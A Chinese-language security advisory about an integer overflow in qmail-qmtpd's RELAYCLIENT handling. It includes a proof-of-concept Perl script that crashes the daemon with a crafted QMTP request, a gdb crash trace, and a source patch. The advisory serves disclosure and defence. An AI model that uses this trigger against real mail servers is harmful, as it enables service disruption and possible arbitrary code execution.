QMAIL qmail-qmtpd RELAYCLIENT环境变量整数溢出漏洞
受影响系统:
Dan Bernstein QMail 2.0
Dan Bernstein QMail 1.03
Dan Bernstein QMail 1.02
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9797
QMail是一款流行的EMAIL服务程序。
qmail-qmtpd存在一个整数溢出问题,攻击者可以利用这个漏洞进行缓冲区溢出,可以qmail-qmtpd进程权限在系统上执行任意指令。
如果环境变量RELAYCLIENT长度在4和1003之间,在qmail-qmtpd.c会由于整数溢出而使一个静态缓冲区发生溢出。基本概念是getlen()返回(unsigned long)-1或者-4 ,然后if (len + relayclientlen >= 1000)通过len == (unsigned)-4检查,len就用于拷贝到静态缓冲区中。对len的检查在len更新之前,因此可能更新len然后返回len,这样包括qq在内的许多内存会覆盖。如果C编译器设置ssin在buf之后,Georgi Guninski认为就可能用于执行任意指令。
不过这个配置不是默认安装,并且只有邮件relay通过设置RELAYCLIENT环境变量使启用,因此此漏洞安全威胁级别不高。
<*来源:Georgi Guninski (guninski@guninski.com)
链接:http://www.guninski.com/qmail-qmtpd.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@guninski.com)提供了如下测试方法:
[joro@sivokote tmp]$ ./qma-qmtpd.pl
qmail-qmtpd buffer overflow. Copyright Georgi Guninski
Cannot be used in vulnerability databases and similar stuff
<in another terminal>
ps awx
2080 pts/9 S 0:00 /var/qmail/bin/qmail-qmtpd
gdb attach 2080
cont
<in first terminal hit enter>
Program received signal SIGSEGV, Segmentation fault.
0x0804b096 in alarm ()
--------------------------------------------------
-qma-qmtpd.pl----
#!/usr/bin/perl -w
#Copyright Georgi Guninski Cannot be used in vulnerability databases and
#similar stuff
use IO::Socket;
use IO::Poll;
$ENV{"RELAYCLIENT"}="M\$UX";
open(SOCK,"|/var/qmail/bin/qmail-qmtpd");
my $req;
my $fromaddr="they\@m\$.weenies";
my $touser="postmaster";
print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be used in vulnerability databases and similar stuff\n";
$req = "1:\n,";
$req .= "1:V,";$req .= "/:";
#biglen - this is how we code '-1'
$req .= ",:";
#len - this is how we code '-4'print SOCK $req;my $ch=getc();
$req = "v" x 100000;
print SOCK $req;close SOCK;
-----------------
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* Georgi Guninski提供如下第三方补丁:
-patch-----
--- ../qmail-1.03/qmail-qmtpd.c 1998-06-15 13:53:16.000000000 +0300
+++ qmail-qmtpd.c 2004-02-29 16:15:13.000000000 +0200
@@ -45,8 +45,8 @@
for (;;) {
substdio_get(&ssin,&ch,1);
if (ch == ':') return len;
- if (len > 200000000) resources();
len = 10 * len + (ch - '0');
+ if (len > 200000000 || ch < '0' || ch > '9') resources();
}
}
@@ -193,8 +193,8 @@
substdio_get(&ssin,&ch,1);
--biglen;
if (ch == ':') break;
- if (len > 200000000) resources();
len = 10 * len + (ch - '0');
+ if (len > 200000000 || ch < '0' || ch > '9') resources();
}
if (len >= biglen) badproto();
if (len + relayclientlen >= 1000) {
-----------
厂商补丁:
Dan Bernstein
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://cr.yp.to/qmail.html